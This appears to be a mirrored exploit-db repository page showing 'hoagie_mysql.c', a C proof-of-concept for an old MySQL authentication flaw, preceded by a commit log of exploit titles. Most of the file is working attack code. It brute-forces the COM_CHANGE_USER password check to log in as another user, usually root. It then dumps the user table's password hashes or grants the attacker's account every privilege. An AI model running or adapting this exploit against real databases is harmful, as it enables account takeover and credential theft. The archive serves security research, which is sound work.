bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/unix/remote/22084.c
Offensive Security 880bbe402e DB: 2019-03-08 
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

163 lines
No EOL
5.8 KiB
C
Raw Blame History

/*
source: https://www.securityfocus.com/bid/6373/info
A flaw in the password authentication mechanism for MySQL may make it possible for an authenticated database user to compromise the accounts of other database users.
The flaw lies in the fact that the server uses a string returned by the client when the COM_CHANGE_USER command is issued to iterate through a comparison when attempting to authenticate the password. An attacker may authenticate as another database user if they can successfully guess the first character of the correct password for that user. The range of the valid character set for passwords is 32 characters, which means that a malicious user can authenticate after a maximum of 32 attempts if they cycle through all of the valid characters.
*/
/***********************************************************
* hoagie_mysql.c
*
* local and remote exploit for mysql <= 3.23.53a
*
* new years present .... works also for 3.23.54 openbsd
* (head) date 16/12/2002
*
* hey after some code checking and patching my mysql server
* i relized, that this patch doesnt protect you against
* this vulnerability.
* The length of the scramble string is important for the
* password check and not the length of the password.
*
* perhaps other system are also still vulnerable
*
* gcc hoagie_mysql.c -o hoagie_mysql -lmysqlclient -I/usr/local/include -L/usr/local/lib/mysql
*
* Author: Andi <andi@void.at>
*
* Greetz to Greuff, philipp and the other hoagie-fellas :-)
*
* With this exploit you can also do that nasty things:
* http://void.at/andi/mysql.pdf
*
* $ ./hoagie_mysql -u dbuser -p dbpass
* connecting to [localhost] as [dbpass] ... ok
* sending one byte requests with user [root] ...
* root 13fb921913f4b3b1
* root
* ...........
* ........
* $
*
* If root or the attack user has no passwort set, this
* exploit will fail -> thx to philipp
*
* THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-
* CONCEPT. THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY
* DAMAGE DONE USING THIS PROGRAM.
*
************************************************************/
#include <stdio.h>
#include <unistd.h>
#include <mysql/mysql.h>
int do_attack(MYSQL *mysql, char *attackuser);
void do_action(MYSQL *mysql, char *action, char *user);
char *strmov(register char *dst, register const char *src);
int main(int argc, char **argv) {
MYSQL mysql;
char optchar;
char *target, *user, *password, *attackuser, *action;
target = user = password = action = attackuser= NULL;
while ( (optchar = getopt(argc, argv, "ht:u:p:a:e:")) != EOF ) {
switch(optchar) {
case 'h': printf("hoagie_mysql.c\n");
printf("-t ... mysql server (default localhost)\n");
printf("-u ... username (default empty)\n");
printf("-p ... password (default empty)\n");
printf("-a ... attack user (default root)\n");
printf("-e ... action\n");
printf("-h ... this screen\n");
exit(0);
case 't': target = optarg;
break;
case 'u': user = optarg;
break;
case 'p': password = optarg;
break;
case 'a': attackuser = optarg;
break;
case 'e': action = optarg;
}
}
if (!target) target = "localhost";
if (!user) user = "";
if (!password) password = "";
if (!attackuser) attackuser = "root";
if (!action) action = "dumpuser";
printf("connecting to [%s] as [%s] ... ", target, user);
fflush(stdin);
if (!mysql_connect(&mysql, target, user, password)) {
printf("failed\n");
return 0;
} else {
printf("ok\n");
}
printf("sending one byte requests with user [%s] ... \n", attackuser);
if (!do_attack(&mysql, attackuser)) {
do_action(&mysql, action, user);
} else {
printf("attack failed\n");
}
mysql_close(&mysql);
return 0;
}
int do_attack(MYSQL *mysql, char *attackuser) {
char buff[512], *pos=buff, *attackpasswd = "A";
int i, len, j, ret = 1;
pos = (char*)strmov(pos,attackuser)+1;
mysql->scramble_buff[1] = 0;
pos = scramble(pos, mysql->scramble_buff, attackpasswd,
(my_bool) (mysql->protocol_version == 9));
pos = (char*)strmov(pos+1,"");
len = pos-buff;
for (j = 0; ret && j < 32; j++) {
buff[5] = 65 + j;
ret = simple_command(mysql,COM_CHANGE_USER, buff,(uint)len,0);
}
return ret;
}
void do_action(MYSQL *mysql, char *action, char *user) {
MYSQL_ROW row;
MYSQL_RES *result;
char buf[512];
mysql_select_db(mysql, "mysql");
if (!strcmp(action, "dumpuser")) {
mysql_query(mysql, "select user, password, host from user");
result = mysql_use_result(mysql);
while ((row = mysql_fetch_row(result)))
printf("%16s %16s %50s\n", row[0], row[1], row[2]);
mysql_free_result(result);
} else if (!strcmp(action, "becomeadmin")) {
snprintf(buf, sizeof(buf) - 1,
"update user set Select_priv='Y', Insert_priv='Y', Update_priv='Y', Delete_priv='Y', "
" Create_priv='Y', Drop_priv='Y', Reload_priv='Y', Shutdown_priv='Y', Process_priv='Y', "
" File_priv='Y', Grant_priv='Y', References_priv='Y', Index_priv='Y', Alter_priv='Y' where "
" user = '%s'", user);
mysql_query(mysql, buf);
mysql_reload(mysql);
} /* do whatever you want ... see mysql api ... // else if ( */
}
char *strmov(register char *dst, register const char *src)
{
while ((*dst++ = *src++)) ;
return dst-1;
}
Reference in a new issue View git blame Copy permalink